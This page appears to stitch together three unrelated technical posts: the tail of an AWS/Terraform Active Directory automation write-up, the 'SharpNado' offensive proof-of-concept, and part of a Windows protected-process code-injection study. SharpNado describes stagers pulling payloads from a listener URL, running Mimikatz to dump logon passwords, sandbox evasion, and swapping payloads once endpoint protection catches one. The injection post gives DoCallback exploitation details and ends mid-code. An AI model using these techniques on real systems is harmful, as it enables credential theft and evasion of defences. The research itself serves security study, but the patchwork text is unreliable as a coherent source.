<powershell>
Write-Host "My domain name is ${domain} (${shortname})"
Write-Host "I get secrets from ${vaultaddress}"
# ... continue configuration
</powershell>

In addition to ensuring that the logic for configuring your instance is correct, something equally important is validation, to reduce false positives when putting an instance in service. AWS provides a tool for this called lifecycle hooks. Since lifecycle hook completions are called manually from the bootstrap script, the script can contain additional logic for validating settings and services before declaring the instance in service.
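For illustration, a hedged sketch of that completion call is below; the hook and ASG names are hypothetical, and the actual bootstrap script in this setup is PowerShell, so this only shows the API call involved.

# Hedged sketch: complete a launch lifecycle hook once validation has passed.
import boto3
import requests

def complete_launch_hook(hook_name="ad-launch-hook", asg_name="my_asg", healthy=True):
    instance_id = requests.get(
        "http://169.254.169.254/latest/meta-data/instance-id", timeout=2).text
    autoscaling = boto3.client("autoscaling")
    autoscaling.complete_lifecycle_action(
        LifecycleHookName=hook_name,
        AutoScalingGroupName=asg_name,
        InstanceId=instance_id,
        # CONTINUE puts the instance in service; ABANDON terminates it.
        LifecycleActionResult="CONTINUE" if healthy else "ABANDON")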

Instance clean-up

The final part of the lifecycle that needs to be addressed is instance decommissioning. Launching instances in the cloud gives us tremendous flexibility, but we also need to be prepared for the inevitable failure of a node or user-initiated replacement. When this happens, we attempt to terminate the instance as gracefully as possible. For example, we may need to transfer the Flexible Single-Master Operation (FSMO) role and clean up DNS entries.

We chose to implement lifecycle hooks using a simple scheduled task to check the instance's state in the ASG. When the state has been set to Terminating:Wait, we run the cleanup logic and complete the terminate hook explicitly. We know that lifecycle hooks are not guaranteed to complete or fire (e.g., when instances experience hardware failure) so if consistency is a requirement for you, you should look into implementing an external cleanup service or additional logic within bootstrapping.
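A hedged sketch of that scheduled check, with hypothetical hook and ASG names and a placeholder cleanup step:

# Hedged sketch: poll the instance's lifecycle state and trigger cleanup when
# the ASG has set it to Terminating:Wait. In practice this ran as a Windows
# scheduled task; names and cleanup contents are placeholders.
import boto3
import requests

def run_cleanup():
    pass  # placeholder: transfer FSMO roles, remove DNS records, etc.

def check_for_termination(hook_name="ad-terminate-hook", asg_name="my_asg"):
    instance_id = requests.get(
        "http://169.254.169.254/latest/meta-data/instance-id", timeout=2).text
    autoscaling = boto3.client("autoscaling")
    state = autoscaling.describe_auto_scaling_instances(
        InstanceIds=[instance_id])["AutoScalingInstances"][0]["LifecycleState"]
    if state == "Terminating:Wait":
        run_cleanup()
        autoscaling.complete_lifecycle_action(
            LifecycleHookName=hook_name,
            AutoScalingGroupName=asg_name,
            InstanceId=instance_id,
            LifecycleActionResult="CONTINUE")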

Putting it all together: Terraforming Active Directory

Bootstrapping infrastructure

With our Packer configuration now complete, it is time to use Terraform to configure our AD infrastructure and deploy AMIs. We implemented this by creating and invoking a Terraform module that automagically bootstraps our new forest. Bootstrapping a new forest involves deploying a primary Domain Controller (DC) to serve as the FSMO role holder, and then updating the VPC’s DHCP Options Set so that instances can resolve AD DNS. 

The design pattern that we chose to automate the bootstrapping of the AD forest was to divide the process into two distinct states and switch between them by simply updating the required variables (lifecycle, configure_dhcp_os) in our Terraform module and applying it.

Let us take a look at the module invocation in the two states starting with the Bootstrap State where we deploy our primary DC to the VPC:

# Bootstrap Forest
module "ad" {
  source = "git@private-github:ad/terraform.git"

  env      = "staging"
  mod_name = "MyADForest"

  key_pair_name = "myawesomekeypair"
  vpc_id        = "vpc-12345"
  subnet_ids    = ["subnet-54321", "subnet-64533"]

  trusted_cidrs      = ["15.0.0.0/8"]
  need_trusted_cidrs = "true"

  domain_name       = "ad.forest"
  domain_short_name = "ad"
  base_fqdn         = "DC=ad,DC=forest"
  vault_addr        = "https://vault.secret.place"

  need_fsmo = "true"

  # Add me for step 1 and swap me out for step 2
  lifecycle = "bootstrap"

  # Set me to true when lifecycle = "steady"
  configure_dhcp_os = "false"
}

Once the Bootstrap State is complete, we switch to the Steady State where we deploy our second DC and update the DHCP Options Set. The module invocation is exactly the same except for the changes made to the lifecycle and configure_dhcp_os variables:

# Apply Steady State
module "ad" {
  source = "git@private-github:ad/terraform.git"

  env      = "staging"
  mod_name = "MyADForest"

  key_pair_name = "myawesomekeypair"
  vpc_id        = "vpc-12345"
  subnet_ids    = ["subnet-54321", "subnet-64533"]

  trusted_cidrs      = ["15.0.0.0/8"]
  need_trusted_cidrs = "true"

  domain_name       = "ad.forest"
  domain_short_name = "ad"
  base_fqdn         = "DC=ad,DC=forest"
  vault_addr        = "https://vault.secret.place"

  need_fsmo = "true"

  # Add me for step 1 and swap me out for step 2
  lifecycle = "steady"

  # Set me to true when lifecycle = "steady"
  configure_dhcp_os = "true"
}

Using this design pattern, we were able to automate the entire deployment process and manually transition between the two states as needed. Relevant resources are conditionally provisioned during the two states by making use of the count primitive and interpolation functions in Terraform.

Managing steady state

Once our AD infrastructure is in a Steady state, we update the configuration and apply patches by replacing our instances with updated AMIs using Bouncer. We run Bouncer in serial mode to gracefully decommission a DC and replace it by bringing up a DC with a new image as outlined in the “Instance Clean Up” section above. Once the first DC has been replaced, Bouncer will proceed to cycle the next DC.

Conclusion

Using the above approach we were able to create an isolated, highly-available AD environment and manage it entirely using code. It made the secure thing to do the easy thing to do because we are able to use Git-based workflows, with 2-FA, to gate and approve changes as all of the configuration exists in source control. Furthermore, we have found that this approach of tying our patch management process to our CI/CD pipeline has led to much faster patch compliance due to reduced friction.

In addition to the security wins, we have also improved the operational experience by mitigating configuration drift and being able to rely on code as a source for documentation. It also helps that our disaster recovery strategy for this forest amounts to redeploying the code in a different region. Additionally, benefits like change tracking and peer reviews that have normally been reserved for software development are now also applied to our AD ops processes.

SharpNado — Teaching an old dog evil tricks using .NET Remoting or WCF to host smarter and dynamic payloads

( Original text by Shawn Jones )

Disclaimer:

I am not a security researcher, expert, or guru.  If I misrepresent anything in this article, I assure you it was by accident and I will gladly make any updates if needed.  This is intended for educational purposes only.

TL;DR:

SharpNado is a proof of concept tool that demonstrates how one could use .NET Remoting or Windows Communication Foundation (WCF) to host smarter and dynamic .NET payloads.  SharpNado is not meant to be a fully functioning, robust payload delivery system, nor is it anything groundbreaking. It's merely something to get the creative juices flowing on how one could use these technologies, or others, to create dynamic and hopefully smarter payloads. I have provided a few simple examples of how this could be used to either dynamically execute base64 assemblies in memory or dynamically compile source code and execute it in memory.  This, however, could be expanded upon to include different kinds of stagers, payloads, protocols, etc.

So, what is WCF and .NET Remoting?

While going over these is beyond the scope of this blog, Microsoft describes Windows Communication Foundation as a framework for building service-oriented applications and .NET Remoting as a framework that allows objects living in different AppDomains, processes, and machines to communicate with each other.  For the sake of simplicity, let’s just say one of its use cases is it allows two applications living on different systems to share information back and forth with each other. You can read more about them here:

WCF

.NET Remoting

 A few examples of how this could be useful:

1. Smarter payloads without the bulk

What do I mean by this?  Since WCF and .NET Remoting are designed for communication between applications, they allow us to build logic server side to make smarter decisions depending on what information the client (stager) sends back to the server.  This means our stager can stay small and flexible, but we can also build complex rules server side that change what the stager executes depending on environmental situations.  A very simple example of payload logic would be the classic: if the domain user equals X, fire; if not, don't.  While this doesn't seem very climactic, you could easily build in more complex rules.  For example, if the domain user equals X, the internal domain is correct, and user X has administrative rights, run payload Y; or if user X is a standard user and the internal domain is correct, run payload Z.  Adding to this, we could say if user X is correct, but the internal domain is a mismatch, send back the correct internal domain and let me choose whether I want to fire the payload or not.  These back-end rules can be as simple or complex as you like.  I have provided a simple sandbox evasion example with SharpNado that could be expanded upon and a quick walkthrough of it in the examples section below.
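SharpNado implements this logic in C# behind the WCF/.NET Remoting interface; purely to illustrate the shape of such back-end rules, here is a hypothetical sketch in Python (usernames, domains, and payload names are all made up):

# Hypothetical sketch (not SharpNado code) of server-side gating rules: the
# stager reports context, the server decides which payload (if any) to return.
def choose_payload(username, domain, is_admin):
    if domain != "CORP.LOCAL":
        # Wrong environment: return nothing malicious, just record what we saw.
        return None, "unexpected domain: %s" % domain
    if username == "targetuser" and is_admin:
        return "payload_admin_b64", "admin target matched"
    if username == "targetuser":
        return "payload_user_b64", "standard user target matched"
    return "benign_b64", "unknown user, serving benign payload"

if __name__ == "__main__":
    payload, reason = choose_payload("targetuser", "CORP.LOCAL", is_admin=False)
    print(reason, "->", payload)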

2. Payloads can be dynamic and quickly changed on the fly:

Before diving into this, let’s talk about some traditional ways of payload delivery first and then get into how using a technology like WCF or .NET Remoting could be helpful.  In the past and even still today, many people hard-code their malicious code into the payload sent, often using some form of encryption that only decrypts and executes upon meeting some environmental variable or often they use a staged approach where the non-malicious stager reaches out to the web, retrieves our malicious code and executes it as long as environmental variables align.  The above examples are fine and still work well even today and I am in no way tearing these down at all or saying better ways don’t exist.  I am just using them as a starting point to show how I believe the below could be used as a helpful technique and up the game a bit, so just roll with it.

So what are a few of the pain points of the traditional payload delivery methods?  Well with the hard-coded payload, we usually want to keep our payloads small so the complexity of our malicious code we execute is minimal, hence the reason many use a stager as the first step of our payload.  Secondly, if we sent out 10 payloads and the first one gets caught by end point protection, then even if the other 9 also get executed by their target, they too will fail.  So, we would have to create a new payload, pick 10 new targets and again hope for the best.

Using WCF or .NET Remoting we can easily create a light stager that allows us to quickly switch what the stager will execute.  We can do this either through back-end server logic, as discussed above, or by quickly setting different payloads within the SharpNado console.  So, let's say our first payload gets blocked by endpoint protection. Since we already know our stager did try to execute our first payload, due to the way the stager and server communicate, we can use our deductive reasoning skills to conclude that our stager is good but the malicious code it tried to execute got caught. We can quickly, in the console, switch our payload to our super stealthy payload, and the next time any of the stagers execute, the super stealthy payload will fire instead of the original payload which got caught. This saves us the hassle of sending a new payload to new targets.  I have provided simple examples of how to do this with SharpNado that could be expanded upon and a quick walk through of it in the examples section below.

3. Less complex to setup:

You might be thinking to yourself that I could do all this with mod rewrite rules and while that is absolutely true, mod rewrite rules can be a little more complex and time consuming to setup.  This is not meant to replace mod rewrite or anything.  Long live mod rewrite!  I am just pointing out that writing your back-end rules in a language like C# can allow easier to follow rules, modularization, and data parsing/presentation.

4. Payloads aren’t directly exposed:

What do I mean by this?  You can’t just point a web browser at your server IP and see payloads hanging out in some open web directory to be analyzed/downloaded.  In order to capture payloads, you would have to have some form of MiTM between the stager and the server.  This is because when using WCF or .NET Remoting, the malicious code (payload) you want your stager to execute along with any complex logic we want to run sits behind our remote server interface.  That remote interface exposes only the remote server side methods which can then be called by your stager. Now, if at this point you are thinking WTF, I encourage you to review the above links and dive deeper into how WCF or .NET Remoting works.  As there are many people who explain it and understand it better than I ever will.

Keep in mind that you would still want to encrypt all of your payloads before they are sent over the wire to better protect them.  You would also want to use other evasion techniques, for example, the number of times the stager has been called or how much time has passed since the stager was sent, etc.

5. Been around awhile:

.NET Remoting and WCF have been around a long time. There are tons of examples out there from developers on lots of ways to use this technology legitimately and it is probably a pretty safe bet that there are still a lot of organizations using this technology in legit applications. Like you, I like exposing ways one might do evil with things people use for legit purposes and hopefully bring them to light. Lastly, the above concepts could be used with other technologies as well, this just highlights one of many ways to accomplish the same goal.
Examples:

Simple dynamic + encrypted payload example:

In the first example we will use SharpNado to host a base64 version of SharpSploitConsole and execute the Mimikatz logonpasswords function.  First, we will set up the XML payload template that the server will use when our stager executes.  Payload template examples can be found on GitHub in the Payloads folder.  Keep in mind that the ultimate goal would be to have many payload templates already set up that you could quickly switch between. The below screenshots give an example of what the template would look like.

Template example:

This is what it would look like after pasting in base64 code and setting arguments:

Once we have our template payload set up, we can go ahead and run SharpNado_x64.exe (with Administrator rights) and set up the listening service that our stager will call out to. In this example we will use WCF over HTTP on port 8080, so our stager should be set up to connect to http://192.168.55.250:8080/Evil.  I would like to note two things here.  First, with a little bit of work upfront server side, this could be modified to support HTTPS. Secondly, SharpNado does not depend on the templates being set up prior to running.  You can add/delete/modify templates at any time while the server is running using whatever text editor you would like.

Now let’s see what payloads we currently have available.  Keep in mind you may use any naming scheme you would like for your payloads.  I suggest naming payloads and stagers what makes most sense to you.  I only named them this way to make it easier to follow along.

In this example I will be using the b64SharpSploitConsole payload and have decided that I want the payload to be encrypted server side and decrypted client side using the super secure password P@55w0rd.  I would like to note here (outlined in red) that it is important for you to set your payload directory correctly.  This directory is what SharpNado uses to pull payloads.  A good way to test this is to run the command "show payloads" and if your payloads show up, you know you set it correctly.

Lastly, we will set up our stager.  Since I am deciding to encrypt our payload, I will be using the example SharpNado_HTTP_WCF_Base64_Encrypted.cs stager found in the Stagers folder on GitHub.  I will simply be compiling this and running the stager exe, but this could be delivered via DotNetToJScript or by some other means if you like.

Now that we have compiled our stager, we will start the SharpNado service by issuing the "run" command.  This shows us what interface is up and what the service is listening on, so it is good to check this to make sure, again, that everything is set up correctly.

Now when our stager gets executed, we should see the below.

And on our server side we can see that the encrypted server method was indeed called by our stager.  Keep in mind, we can build in as much server logic as we like.  This is just an example.

Now for demo purposes, I will quickly change the payload to b64NoPowershell_ipconfig_1 and when we run the same exact stager again, we instead will show our ipconfig information.  Again, this is only for simple demonstration of how you can quickly change out payloads.

Simple sandbox evade example:

In this second example I will go over an extremely watered-down version of how you could use SharpNado to build smarter payloads.  The example provided with SharpNado is intended to be a building block and could be made as complex or simple as you like.  Since our SharpNado service is already running from our previous example, all we need to do is set the payloads to use in the SharpNado console.  For this example, I again will be using the same payloads from above. I will run the b64SharpSploitConsole payload if we hit our correct target and the b64NoPowershell_ipconfig_1 payload if we don't.

Looking at our simple stager example below we can see that if the user anthem is who executed our stager, the stager will send a 1 back to the SharpNado service or a 0 will be sent if the user isn’t anthem.  Please keep in mind you could however send back any information you like, including username, domain, etc.

Below is a partial screenshot of the example logic I provided with SharpNado. Another thing I want to point out is that I provided an example of how you could count how many times the service method has been called and depending on threshold kill the service.  This would be an example of building in counter measures if we think we are being analyzed and/or sand-boxed.

Moving forward when we run our stager with our anthem user, we can see that we get a message server side and that the correct payload fired.

Now if I change the user to anthem2 and go through the process again, we can see that our non-malicious payload fires.  Keep in mind, the stagers could be set up in a way that values aren't hard coded in.  You could have a list of users on your server and have your stager loop through that list and, if anything matches, execute, and if not do something else.  Again, it's really up to your imagination.

Compile source code on the fly example:

Let's do one more quick example, this time using C# source code.  This stager method uses System.CodeDom.Compiler, which does briefly drop files to disk right before executing in memory, but one could create a stager that takes advantage of the open source C# and VB compiler Roslyn to do the same thing without touching disk, as pointed out by @cobbr_io in his SharpShell blog post.

The below payload template example runs a No PowerShell payload that executes ipconfig but I also provided an example that would execute a PowerShell Empire or PowerShell Cobalt Strike Beacon on GitHub:

Then we will setup our stager.  In this example I will use the provided GitHub stager SharpNado_HTTP_WCF_SourceCompile.cs.

We will then take our already running SharpNado service and quickly add our payload.

Now when we run our stager, we should see our ipconfig output.

Conclusion:

Hopefully this has been a good intro to how one could use WCF or .NET Remoting offensively or at least sparked a few ideas for you to research on your own. I am positive that there are much better ways to accomplish this, but it was something that I came across while doing other research and I thought it would be neat to whip up a small POC.  Till next time and happy hacking!

Link to tools:

SharpNado — https://github.com/anthemtotheego/SharpNado

SharpNado Compiled Binaries — https://github.com/anthemtotheego/SharpNado/tree/master/CompiledBinaries

SharpSploitConsole — https://github.com/anthemtotheego/SharpSploitConsole

SharpSploit — https://github.com/cobbr/SharpSploit

Injecting Code into Windows Protected Processes using COM — Part 2

( Original text by James Forshaw )

In my previous blog I discussed a technique which combined numerous issues I’ve previously reported to Microsoft to inject arbitrary code into a PPL-WindowsTCB process. The techniques presented don’t work for exploiting the older, stronger Protected Processes (PP) for a few different reasons. This blog seeks to remedy this omission and provide details of how I was able to also hijack a full PP-WindowsTCB process without requiring administrator privileges. This is mainly an academic exercise, to see whether I can get code executing in a full PP as there’s not much more you can do inside a PP over a PPL.

As a quick recap of the previous attack, I was able to identify a process which would run as PPL which also exposed a COM service. Specifically, this was the “.NET Runtime Optimization Service” which ships with the .NET framework and uses PPL at CodeGen level to apply cached signing levels to Ahead-of-Time compiled DLLs to allow them to be used with User-Mode Code Integrity (UMCI). By modifying the COM proxy configuration it was possible to induce a type confusion which allowed me to load an arbitrary DLL by hijacking the KnownDlls configuration. Once running code inside the PPL I could abuse a bug in the cached signing feature to create a DLL signed to load into any PPL and through that escalate to PPL-WindowsTCB level.

Finding a New Target

My first thought on exploiting full PP would be to use the additional access we were granted from having code running at PPL-WindowsTCB. You might assume you could abuse the cached signed DLL to bypass security checks to load into a full PP. Unfortunately the kernel’s Code Integrity module ignores cached signing levels for full PP. How about KnownDlls in general? If we have administrator privileges and code running in PPL-WindowsTCB we can directly write to the KnownDlls object directory (see another of my blog posts for why you need to be PPL) and try to get the PP to load an arbitrary DLL. Unfortunately, as I mentioned in the previous blog, this also doesn’t work as full PP ignores KnownDlls. Even if it did load KnownDlls, I don’t want to require administrator privileges to inject code into the process.

I decided that it’d make sense to rerun my PowerShell script from the previous blog to discover which executables will run as full PP and at what level. On Windows 10 1803 there’s a significant number of executables which run at PP-Authenticode level, however only four executables would start with a more privileged level, as shown in the following table.

Path                                      Signing Level
C:\windows\system32\GenValObj.exe         Windows
C:\windows\system32\sppsvc.exe            Windows
C:\windows\system32\WerFaultSecure.exe    WindowsTCB
C:\windows\system32\SgrmBroker.exe        WindowsTCB

As I have no known route from PP-Windows level to PP-WindowsTCB level like I had with PPL, only two of the four executables are of interest, WerFaultSecure.exe and SgrmBroker.exe. I correlated these two executables against known COM service registrations, which turned up no results. That doesn’t mean these executables don’t expose a COM attack surface; the .NET executable I abused last time also doesn’t register its COM service, so I also performed some basic reverse engineering looking for COM usage.

The SgrmBroker executable doesn’t do very much at all. It’s a wrapper around an isolated user mode application to implement runtime attestation of the system as part of Windows Defender System Guard and didn’t call into any COM APIs. WerFaultSecure also doesn’t seem to call into COM, however I already knew that WerFaultSecure can load COM objects, as Alex Ionescu used my original COM scriptlet code execution attack to get PPL-WindowsTCB level through hijacking a COM object load in WerFaultSecure. Even though WerFaultSecure didn’t expose a service, if it could initialize COM perhaps there was something that I could abuse to get arbitrary code execution? To understand the attack surface of COM we need to understand how COM implements out-of-process COM servers and COM remoting in general.

Digging into COM Remoting Internals

Communication between a COM client and a COM server is over the MSRPC protocol, which is based on the Open Group’s DCE/RPC protocol. For local communication the transport used is Advanced Local Procedure Call (ALPC) ports. At a high level communication occurs between a client and server based on the following diagram:

In order for a client to find the location of a server the process registers an ALPC endpoint with the DCOM activator in RPCSS ①. This endpoint is registered alongside the Object Exporter ID (OXID) of the server, which is a 64 bit randomly generated number assigned by RPCSS. When a client wants to connect to a server it must first ask RPCSS to resolve the server’s OXID value to an RPC endpoint ②. With the knowledge of the ALPC RPC endpoint the client can connect to the server and call methods on the COM object ③.

The OXID value is discovered either from an out-of-process (OOP) COM activation result or via a marshaled Object Reference (OBJREF) structure. Under the hood the client calls the ResolveOxid method on RPCSS’s IObjectExporter RPC interface. The prototype of ResolveOxid is as follows:

interface IObjectExporter {
  // ...
  error_status_t ResolveOxid(
    [in] handle_t hRpc,
    [in] OXID* pOxid,
    [in] unsigned short cRequestedProtseqs,
    [in] unsigned short arRequestedProtseqs[],
    [out, ref] DUALSTRINGARRAY** ppdsaOxidBindings,
    [out, ref] IPID* pipidRemUnknown,
    [out, ref] DWORD* pAuthnHint);
}

In the prototype we can see the OXID to resolve is being passed in the pOxid parameter and the server returns an array of Dual String Bindings which represent RPC endpoints to connect to for this OXID value. The server also returns two other pieces of information, an Authentication Level Hint (pAuthnHint) which we can safely ignore, and the IPID of the IRemUnknown interface (pipidRemUnknown) which we can’t.

An IPID is a GUID value called the Interface Process ID. This represents the unique identifier for a COM interface inside the server, and it’s needed to communicate with the correct COM object as it allows the single RPC endpoint to multiplex multiple interfaces over one connection. The IRemUnknown interface is a default COM interface every COM server must implement, as it’s used to query for new IPIDs on an existing object (using RemQueryInterface) and maintain the remote object’s reference count (through the RemAddRef and RemRelease methods). As this interface must always exist regardless of whether an actual COM server is exported, and the IPID can be discovered through resolving the server’s OXID, I wondered what other methods the interface supported in case there was anything I could leverage to get code execution.

The COM runtime code maintains a database of all IPIDs as it needs to look up the server object when it receives a request for calling a method. If we know the structure of this database we could discover where the IRemUnknown interface is implemented, parse its methods and find out what other features it supports. Fortunately I’ve done the work of reverse engineering the database format in my OleViewDotNet tool, specifically the command Get-ComProcess in the PowerShell module. If we run the command against a process which uses COM, but doesn’t actually implement a COM server (such as notepad), we can try and identify the correct IPID.

In this example screenshot there are actually two IPIDs exported, IRundown and a Windows.Foundation interface. The Windows.Foundation interface we can safely ignore, but IRundown looks more interesting. In fact if you perform the same check on any COM process you’ll discover they also have IRundown interfaces exported. Are we not expecting an IRemUnknown interface though? If we pass the ResolveMethodNames and ParseStubMethods parameters to Get-ComProcess, the command will try and parse method parameters for the interface and look up names based on public symbols. With the parsed interface data we can pass the IPID object to the Format-ComProxy command to get a basic text representation of the IRundown interface. After cleanup the IRundown interface looks like the following:

[uuid("00000134-0000-0000-c000-000000000046")]
interface IRundown : IUnknown {
   HRESULT RemQueryInterface(...);
   HRESULT RemAddRef(...);
   HRESULT RemRelease(...);
   HRESULT RemQueryInterface2(...);
   HRESULT RemChangeRef(...);
   HRESULT DoCallback([in] struct XAptCallback* pCallbackData);
   HRESULT DoNonreentrantCallback([in] struct XAptCallback* pCallbackData);
   HRESULT AcknowledgeMarshalingSets(...);
   HRESULT GetInterfaceNameFromIPID(...);
   HRESULT RundownOid(...);
}

This interface is a superset of IRemUnknown; it implements methods such as RemQueryInterface and then adds some more additional methods for good measure. What really interested me was the DoCallback and DoNonreentrantCallback methods, they sound like they might execute a “callback” of some sort. Perhaps we can abuse these methods? Let’s look at the implementation of DoCallback based on a bit of RE (DoNonreentrantCallback just delegates to DoCallback internally so we don’t need to treat it specially):

struct XAptCallback {
  void* pfnCallback;
  void* pParam;
  void* pServerCtx;
  void* pUnk;
  void* iid;
  int   iMethod;
  GUID  guidProcessSecret;
};

HRESULT CRemoteUnknown::DoCallback(XAptCallback *pCallbackData) {
  CProcessSecret::GetProcessSecret(&pguidProcessSecret);
  if (!memcmp(&pguidProcessSecret,
              &pCallbackData->guidProcessSecret, sizeof(GUID))) {
    if (pCallbackData->pServerCtx == GetCurrentContext()) {
      return pCallbackData->pfnCallback(pCallbackData->pParam);
    } else {
      return SwitchForCallback(
                 pCallbackData->pServerCtx,
                 pCallbackData->pfnCallback,
                 pCallbackData->pParam);
    }
  }
  return E_INVALIDARG;
}

This method is very interesting, it takes a structure containing a pointer to a method to call and an arbitrary parameter and executes the pointer. The only restrictions on calling the arbitrary method are that you must know ahead of time a randomly generated GUID value, the process secret, and the address of a server context. The checking of a per-process random value is a common security pattern in COM APIs and is typically used to restrict functionality to only in-process callers. I abused something similar in the Free-Threaded Marshaler way back in 2014.

What is the purpose of DoCallback? The COM runtime creates a new IRundown interface for every COM apartment that’s initialized. This is actually important as when calling methods between apartments, say calling a STA object from an MTA, you need to call the appropriate IRemUnknown methods in the correct apartment. Therefore while the developers were there they added a few more methods which would be useful for calling between apartments, including a general “call anything you like” method. This is used by the internals of the COM runtime and is exposed indirectly through methods such as CoCreateObjectInContext. To prevent the DoCallback method being abused OOP, the per-process secret is checked, which should limit it to only in-process callers, unless an external process can read the secret from memory.
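For illustration only, here is a minimal sketch of the payload a caller would have to assemble before invoking DoCallback through the IRundown proxy. This is not code from the original exploit: the structure layout is the reverse engineered one shown above, and obtaining the proxy (via OXID resolution and the IPID) plus recovering the secret and context values are separate problems discussed below.

#include <windows.h>

// Sketch: build the XAptCallback payload for IRundown::DoCallback. The
// function pointer and parameter must be addresses valid inside the target
// process; the context and secret must be read out of its memory somehow.
struct XAptCallback {
  void* pfnCallback;
  void* pParam;
  void* pServerCtx;
  void* pUnk;
  void* iid;
  int   iMethod;
  GUID  guidProcessSecret;
};

XAptCallback BuildCallbackPayload(void* pfnTarget, void* param,
                                  void* recoveredServerCtx,
                                  const GUID& recoveredSecret) {
  XAptCallback cb = {};
  cb.pfnCallback = pfnTarget;          // e.g. address of LoadLibraryW
  cb.pParam = param;                   // e.g. remote pointer to a DLL path
  cb.pServerCtx = recoveredServerCtx;  // must match the server's context
  cb.guidProcessSecret = recoveredSecret;
  return cb;                           // handed to IRundown::DoCallback
}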

Abusing DoCallback

We have a primitive to execute arbitrary code within any process which has initialized COM by invoking the DoCallback method, which should include a PP. In order to successfully call arbitrary code we need to know four pieces of information:

  1. The ALPC port that the COM process is listening on.
  2. The IPID of the IRundown interface.
  3. The initialized process secret value.
  4. The address of a valid context, ideally the same value that GetCurrentContext returns to call on the same RPC thread.

Getting the ALPC port and the IPID is easy, if the process exposes a COM server, as both will be provided during OXID resolving. Unfortunately WerFaultSecure doesn’t expose a COM object we can create, so that angle wouldn’t be open to us, leaving us with a problem we need to solve. Extracting the process secret and context value requires reading the contents of process memory. This is another problem, as one of the intentional security features of PP is preventing a non-PP process from reading memory from a PP process. How are we going to solve these two problems?

Talking this through with Alex at Recon we came up with a possible attack if you have administrator access. Even being an administrator doesn’t allow you to read memory directly from a PP process. We could have loaded a driver, but that would break PP entirely, so we considered how to do it without needing kernel code execution.

First and easiest, the ALPC port and IPID can be extracted from RPCSS. The RPCSS service does not run protected (not even PPL) so this is possible to do without any clever tricks other than knowing where the values are stored in memory. For the context pointer, we should be able to brute force the location as there’s likely to be only a narrow range of memory locations to test, made slightly easier if we use the 32 bit version of WerFaultSecure.

Extracting the secret is somewhat harder. The secret is initialized in writable memory and therefore ends up in the process’ working set once it’s modified. As the page isn’t locked it will be eligible for paging if the memory conditions are right. Therefore if we could force the page containing the secret to be paged to disk we could read it even though it came from a PP process. As an administrator, we can perform the following to steal the secret:

  1. Ensure the secret is initialized and the page is modified.
  2. Force the process to trim its working set, this should ensure the modified page containing the secret ends up paged to disk (eventually).
  3. Create a kernel memory crash dump file using the NtSystemDebugControl system call. The crash dump can be created by an administrator without kernel debugging being enabled and will contain all live memory in the kernel. Note this doesn’t actually crash the system.
  4. Parse the crash dump for the Page Table Entry of the page containing the secret value. The PTE should disclose where in the paging file on disk the paged data is located.
  5. Open the volume containing the paging file for read access, parse the NTFS structures to find the paging file and then find the paged data and extract the secret.

After coming up with this attack it seemed far too much like hard work and needed administrator privileges which I wanted to avoid. I needed to come up with an alternative solution.

Using WerFaultSecure for its Original Purpose

Up to this point I’ve been discussing WerFaultSecure as a process that can be abused to get arbitrary code running inside a PP/PPL. I’ve not really described why the process can run at the maximum PP/PPL levels. WerFaultSecure is used by the Windows Error Reporting service to create crash dumps from protected processes. Therefore it needs to run at elevated PP levels to ensure it can dump any possible user-mode PP. Why can we not just get WerFaultSecure to create a crash dump of itself, which would leak the contents of process memory and allow us to extract any information we require?

The reason we can’t use WerFaultSecure is that it encrypts the contents of the crash dump before writing it to disk. The encryption is done in a way to only allow Microsoft to decrypt the crash dump, using asymmetric encryption to protect a random session key which can be provided to the Microsoft WER web service. Outside of a weakness in Microsoft’s implementation or a new cryptographic attack against the primitives being used, getting the encrypted data seems like a non-starter.

However, it wasn’t always this way. In 2014 Alex presented at NoSuchCon about PPL and discussed a bug he’d discovered in how WerFaultSecure created encrypted dump files. It used a two step process: first it wrote out the crash dump unencrypted, then it encrypted the crash dump. Perhaps you can spot the flaw? It was possible to steal the unencrypted crash dump. Due to the way WerFaultSecure was called it accepted two file handles, one for the unencrypted dump and one for the encrypted dump. By calling WerFaultSecure directly the unencrypted dump would never be deleted, which means that you don’t even need to race the encryption process.

There’s one problem with this, it was fixed in 2015 in MS15-006. After that fix WerFaultSecure encrypts the crash dump directly; it never ends up on disk unencrypted at any point. But that got me thinking, while they might have fixed the bug going forward what prevents us from taking the old vulnerable version of WerFaultSecure from Windows 8.1 and executing it on Windows 10? I downloaded the ISO for Windows 8.1 from Microsoft’s website, extracted the binary and tested it, with predictable results:

We can take the vulnerable version of WerFaultSecure from Windows 8.1 and it will run quite happily on Windows 10 at PP-WindowsTCB level. Why? It’s unclear, but due to the way PP is secured all the trust is based on the signed executable. As the signature of the executable is still valid the OS just trusts it can be run at the requested protection level. Presumably there must be some way that Microsoft can block specific executables, although at least they can’t just revoke their own signing certificates. Perhaps OS binaries should have an EKU in the certificate which indicates what version they’re designed to run on? After all, Microsoft already added a new EKU when moving from Windows 8 to 8.1 to block downgrade attacks that bypass WinRT UMCI signing, so generalizing might make some sense, especially for certain PP levels.

After a little bit of RE and reference to Alex’s presentation I was able to work out the various parameters I needed to pass to the WerFaultSecure process to perform a dump of a PP:

Parameter          Description
/h                 Enable secure dump mode.
/pid {pid}         Specify the Process ID to dump.
/tid {tid}         Specify the Thread ID in the process to dump.
/file {handle}     Specify a handle to a writable file for the unencrypted crash dump.
/encfile {handle}  Specify a handle to a writable file for the encrypted crash dump.
/cancel {handle}   Specify a handle to an event to indicate the dump should be cancelled.
/type {flags}      Specify MINIDUMP_TYPE flags for the call to MiniDumpWriteDump.

This gives us everything we need to complete the exploit. We don’t need administrator privileges to start the old version of WerFaultSecure as PP-WindowsTCB. We can get it to dump another copy of WerFaultSecure with COM initialized and use the crash dump to extract all the information we need, including the ALPC Port and IPID needed to communicate. We don’t need to write our own crash dump parser as the Debug Engine API which comes installed with Windows can be used. Once we’ve extracted all the information we need we can call DoCallback and invoke arbitrary code.
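To make the parameters above concrete, the following is a rough sketch of how the old WerFaultSecure binary could be launched protected with those arguments, using the documented CREATE_PROTECTED_PROCESS creation flag. It is illustrative only: the command line format just follows the table above, the /type value and paths are placeholders, and the handles must be created inheritable for the numeric values passed on the command line to be meaningful in the child.

#include <windows.h>
#include <string>

// Sketch: start WerFaultSecure.exe as a protected process and ask it to dump
// the given process/thread. hDump, hEncDump and hCancel must have been
// created with SECURITY_ATTRIBUTES.bInheritHandle = TRUE.
bool LaunchSecureDump(const std::wstring& werPath, DWORD pid, DWORD tid,
                      HANDLE hDump, HANDLE hEncDump, HANDLE hCancel) {
  std::wstring cmd = L"\"" + werPath + L"\" /h /pid " + std::to_wstring(pid) +
      L" /tid " + std::to_wstring(tid) +
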